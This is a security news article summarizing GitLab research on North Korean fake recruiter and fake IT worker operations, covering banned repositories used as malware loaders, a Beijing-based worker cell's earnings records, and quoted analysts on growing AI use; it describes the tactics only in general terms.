Research from GitLab has exposed the latest tradecraft behind North Korean fake IT worker scams.
GitLab banned 131 North Korean-attributed accounts last year, most of which involved JavaScript repositories that acted as resources in the so-called Contagious Interview campaign.
In most cases, GitLab projects acted as obfuscated loaders for malware payloads — such as BeaverTail and Ottercookie — hosted outside the code repository platform.
Contagious Interview
The Contagious Interview campaign revolves around North Korean threat actors posing as recruiters or hiring managers in order to trick software developers into executing malicious code projects under the pretence of technical interviews.
Operators typically used consumer VPNs when interacting with GitLab, however some occasionally routed their access via dedicated virtual private server (VPS) infrastructures or laptop farms.
GitLab disrupted these operations by banning suspect repositories.
Opportunistic and broadly targeted
These suspect code silos were abused in a variety of illicit projects split between targeting job-seeking programmers and fake IT worker operations.
“Based on our visibility, malware operations targeting individual developers seeking employment are most common,” Oliver Smith, senior threat intelligence engineer at GitLab, told CSO. “Threat actors appear to have a preference for US-based developers and the fintech sector, but are opportunistic and target broadly.”
Smith continued: “For fake IT worker operations, threat actors commonly find employment at smaller organizations seeking contract software developers, particularly through freelancing platforms.”
Larger organizations are also being targeted by the ongoing scams, which began in earnest in 2022 and started as early as 2019.
Evolving tradecraft
Scammers’ tradecraft evolved last year through use of malicious NPM package manager dependencies, sandbox detection, and increasing reliance on invite-only private projects.
North Korean actors also made greater reliance of AI technologies to develop custom obfuscators and through automating the creation of synthetic identities, spun up to generate professional connections and contact leads at scale, GitLab explains in a technical blog post.
One IT worker controlled 21 unique personas, put together by adding their own image to stolen scans of US identity documents.
Some of the banned repositories contained personnel dossiers, passport scans, banking records at multiple Chinese banks and structured quarterly performance spreadsheets.
Inside a fake IT worker boiler room
GitLab explains how one repository reveals detailed financial and personnel records for one likely Beijing-based North Korean IT worker cell that made more than $1.64 million between Q1 2022 and Q3 2025.
The eight-person cell of North Korean nationals pulled in revenue through freelance web and mobile software development while posing under false identities.
Earnings slipped last year but still exceeded $11K per member in Q3 2025, according to the group’s own records.
The private project also contained performance reviews for cell members, dated 2020. These performance reviews include comments about members’ earning and skills development alongside remarks about contributions to household chores among the physically co-located team — including doing laundry, providing haircuts, and purchasing shared food and drink — as well as an assessment of “interpersonal values and adherence to party values.”
Another private code repository was abused by a North Korean fake IT worker likely operating from central Moscow. “The threat actor was focused on cultivation of a smaller group of more detailed personas and progressed from freelance work to full-time employment,” according to GitLab.
GitLab concludes that multiple DPRK teams are operating in parallel with limited coordination but similar tradecraft.
Weaponizing trust
Dray Agha, senior security operations manager at Huntress, said the managed detection and response services firm has observed similar tradecraft across 2025 and early 2026.
“North Korean threat actors are weaponizing the trust inherent in the tech recruitment process, tricking developers into executing malicious payloads under the guise of technical assessments,” Agha said. “By targeting highly privileged developers in lucrative sectors like cryptocurrency and finance, these actors are effectively bypassing traditional perimeter defences to establish immediate footholds.”
DPRK threat actors are adopting generative AI to scale their operations.
“From using AI tools to refine malware obfuscation and bypass security safeguards, to automating the creation of synthetic personas, North Korean groups are rapidly modernizing their tradecraft,” Agha noted. “This demonstrates that AI is actively lowering the barrier for threat actors to execute convincing, large-scale deception.”
Hannah Baumgaertner, head of research at Silobreaker, said that the overall methods deployed by North Korean fake IT worker groups have remained broadly similar though an “increase in the use of AI and other infection methods like ClickFix have been observed in the past year.”
“The types of platforms being abused as part of the scheme also appear to be expanding, with Visual Studio Code now also frequently used for initial access,” Baumgaertner added.
North Korean fake IT worker fraud is a cross-industry issue. GitLab hopes its detailed research, which includes more than 600 indicators of compromise associated with the case studies detailed during its research, will help empower defenders across the industry.
“We hope our report helps the entire industry strengthen defenses and contributes to more transparency around these threat actors’ tactics and operations,” GitLab’s Smith concluded.
An overview of the myriad tactics in play during North Korean fake IT worker scams — alongside advice on thwarting such scams — can be found in an earlier feature on the problem by CSO.